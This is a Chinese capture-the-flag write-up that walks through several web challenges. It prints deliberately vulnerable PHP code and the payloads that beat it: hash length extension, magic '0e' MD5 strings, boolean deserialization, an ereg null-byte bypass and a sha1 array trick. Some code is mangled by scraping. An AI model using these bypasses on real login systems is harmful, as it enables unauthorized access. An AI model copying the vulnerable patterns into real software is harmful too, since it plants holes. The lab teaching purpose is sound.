1009.CTF 题目之 WEB Writeup 通关大全 – 3

Web题目系列3

让我进去

题目链接
http://shiyanbar.com/ctf/1848

题目描述

相信你一定能拿到想要的
Hint:你可能希望知道服务器端发生了什么。。

格式：CTF{}

解题思路
用burpsuite抓包后，发现cookie里有一个字段source=0，修改为1后获取源码。

源码内容

$flag = "XXXXXXXXXXXXXXXXXXXXXXX";
$secret = "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for security!

$username = $_POST["username"];
$password = $_POST["password"];

if (!empty($_COOKIE["getmein"])) {
    if (urldecode($username) === "admin" && urldecode($password) != "admin") {
        if ($COOKIE["getmein"] === md5($secret . urldecode($username . $password))) {
            echo "Congratulations! You are a registered user.\n";
            die ("The flag is ". $flag);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("You are not an admin! LEAVE.");
    }
}

setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));

if (empty($_COOKIE["source"])) {
    setcookie("source", 0, time() + (60 * 60 * 24 * 7));
}
else {
    if ($_COOKIE["source"] != 0) {
        echo ""; // This source code is outputted here
    }
}
    
Admins Only!
If you have the correct credentials, log in below. If not, please LEAVE.

    Username:  

    Password:  

    Submit

从源码分析，可以看到flag的获取要求是：传进一个cookie getmein ,使其等于 secret+urldecode(username . password) MD5 加密后的结果且要求username为admin，password不能为admin。所以这里利用了hash长度扩展攻击，具体原理请参考文章0、文章1、文章2、文章3，推荐查看文章0和3。

这里我给出一个最简单的方式，使用工具hashpumpy进行hash值进行构造，给出代码

#!/usr/bin/env python
#-*- coding: utf-8 -*-
"""
@Author : darkN0te
@Create date : 2018-07-10
@description : 哈希长度攻击
@Update date :   
"""  

import hashpumpy

# def hashpump(hexdigest, original_data, data_to_add, key_length) aaa = hashpumpy.hashpump("571580b26c65f306376d4f64e53cb5c7","admin","darkN0te",20) print aaa 

拐弯抹角

题目链接
http://shiyanbar.com/ctf/1846

题目描述

如何欺骗服务器，才能拿到Flag？
格式：CTF{}

解题思路
访问链接http://ctf5.shiyanbar.com/indirection/index.php/index.php，就可以直接获取到flag。
题目的意思就是通过改变地址栏访问index.php，但是限制了条件不能使用./ ../ \\而且只能使用小写字母，不可以在php后加点，这里我们可以利用伪静态技术，使用index.php后的index.php会被当做参数处理，所以服务器只会解析第一个index.php，满足条件成功绕过。

Flag: CTF{PSEDUO_STATIC_DO_YOU_KNOW}

Forms

题目链接
http://shiyanbar.com/ctf/1819

题目描述

似乎有人觉得PIN码是不可破解的，让我们证明他是错的。
格式：ctf{}

解题思路
进入题目后，点击提交，使用bp拿到包后，发现有一个showsource字段，修改为1然后看到源码，直接把-19827747736161128312837161661727773716166727272616149001823847填入pin提交拿到Flag。

<head>
<title>Formstitle> head>  <pre> $a = $_POST["PIN"]; if ($a == -19827747736161128312837161661727773716166727272616149001823847) { echo "Congratulations! The flag is $flag"; } else { echo "User with provided PIN not found."; } pre>User with provided PIN not found. 
"" method="post"> PIN:<br> <input type="password" name="PIN" value=""> <input type="hidden" name="showsource" value=0> <button type="submit">Enterbutton> form> body> html> 

天网管理系统

题目链接
http://shiyanbar.com/ctf/1810

题目描述

天网你敢来挑战嘛
格式：ctf{ }

解题思路
进入题目后，打开网页源码，网页中有提示，很明显可以看到是一个Hash比较问题，具体内容请查看文章 PHP Hash比较缺陷，这里我们只需要找到以0e开头的md5，这样和0比较就是相等的。下面一个以0e开头的md5列表

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

s878926199a
0e545993274517709034328855841020

使用s878926199a提交后给出了新的提示。

打开链接看到内容

$unserialize_str = $_POST['password'];
     $data_unserialize = unserialize($unserialize_str); if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') { print_r($flag); } 伟大的科学家php方言道：成也布尔，败也布尔。 回去吧骚年 

这段语句首先对password字段进行了反序列化，然后让里面的user等于???，同时pass也等于???。
但是我们不知道两处???到底是什么，因此无法考虑用php函数构造这样的值。别忘了还有一个提示： "伟大的科学家php方言道：成也布尔，败也布尔" ，bool类型的true跟任意字符串可以弱类型相等。因此我们可以构造bool类型的序列化数据 ，无论比较的值是什么，结果都为true。（a代表array，s代表string，b代表bool，而数字代表个数/长度）
构造password值为： a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
在密码栏中提交构造的值，即可获取flag: ctf{dwduwkhduw5465}

忘记密码了

题目链接
http://shiyanbar.com/ctf/1808

题目描述

找回密码
格式：SimCTF{ }

解题思路
此题目有点脑洞，首先在step1.php页面提交邮箱，会给出step2.php页面，然后访问step2.php会马上返回step1.php。所以抓包看一下step2.php的内容。

check error!


    
    
    
    
    
    

    


    
        
找回密码step2
        email:

        token:

        
    

找到了step2.php会将内容提交到submit.php。访问submit.php文件。给出提示

在step2.php的代码中刚好能找到``，构造包访问submit.php还是不可以。这里就是个坑，需要访问submit.php的缓存文件.submit.php.swp，这个文件是使用vim编辑时会留下的一个文件，访问后得到submit.php源码。

if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail'); if($token!='0') die('fail'); $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'"; $r = mysql_query($sql) or die('db error'); $r = mysql_fetch_assoc($r); $r = $r['num']; if($r>0){ echo $flag; }else{ echo "失败了呀"; } } 

这段源码就给出了如何拿到flag，有两个条件：
1. token，长度必须等于10。
2. token要和0相等，这里又用到了php弱类型比较，只要用0000000000就可以绕过这两条限制。

得到payload : http://ctf5.shiyanbar.com/10/upload/[email protected]&token=0000000000 。

flag is SimCTF{huachuan_TdsWX}

Once More

题目链接
http://shiyanbar.com/ctf/1805

题目描述

啊拉？又是php审计。已经想吐了。
hint：ereg()函数有漏洞哩；从小老师就说要用科学的方法来算数。
格式：CTF{

解题思路
点击题目页面View the source code，看到源码。

if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo '
You password must be alphanumeric
'; } else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999) { if (strpos ($_GET['password'], '*-*') !== FALSE) { die('Flag: ' . $flag); } else { echo('
*-* have not been found
'); } } else { echo '
Invalid password
'; } } ?> 

本题目一共有三个条件限制，看如何绕过。
1. ereg ("^[a-zA-Z0-9]+", _GET['password']) === FALSE

===类型恒等于
== 和 != 比较若类型不同，先偿试转换类型，再作值比较，最后返回值比较结果 。
而
=== 和 !== 只有在相同类型下,才会比较其值。
ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false

这个判断限制了输入只能为只能输入字符和数字，但是该函数存在00截断漏洞。

2. strlen($_GET['password']) 9999999，限制字符串长度小于8，值大于9999999。
3. strpos ($_GET['password'], '*-*') !== FALSE，限制输入的值必须包含*-*。

所以给出paylload，1e8%00*-*，1e9%00*-*。

Flag: CTF{Ch3ck_anD_Ch3ck}

Guess Next Session

题目链接
http://shiyanbar.com/ctf/1788

题目描述

写个算法没准就算出来了，23333
hint：你确定你有认真看判断条件？
格式：CTF{}

解题思路
点击题目页面View the source code，看到源码。

if (isset ($_GET['password'])) {
    if ($_GET['password'] == $_SESSION['password']) die ('Flag: '.$flag); else print '
Wrong guess.
'; } mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000)); ?> 

看一下按条件语句，需要session中的password值和用户传的一样，就可以打印flag，所以只需要删掉session值，或者修改session值为一个不存在的session，服务器获取不到session，则password为空，用户传一个空的password的进去即可拿到flag。

Flag: CTF{Cl3ar_th3_S3ss1on}

FALSE

题目链接
http://shiyanbar.com/ctf/1787

题目描述

PHP代码审计
hint：sha1函数你有认真了解过吗？听说也有人用md5碰撞o(╯□╰)o 格式：CTF{} 

解题思路
点击题目页面View the source code，看到源码。

if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '
Your password can not be your name!
'; else if (sha1($_GET['name']) === sha1($_GET['password'])) die('Flag: '.$flag); else echo '
Invalid password.
'; } else{ echo '
Login first!
'; ?> 

本题目给出了两个条件
1. 用户名密码不能相等
2. 用户名密码的sha1()要===

===只有在相同类型下,才会比较其值。sha1()函数默认的传入参数类型是字符串型，可以传入其他类型，使其返回值为false。如数组类型。
所以给出payload为，name[]=a&password[]=b。

Flag: CTF{t3st_th3_Sha1}

转载于:https://www.cnblogs.com/yh-ma/p/10271788.html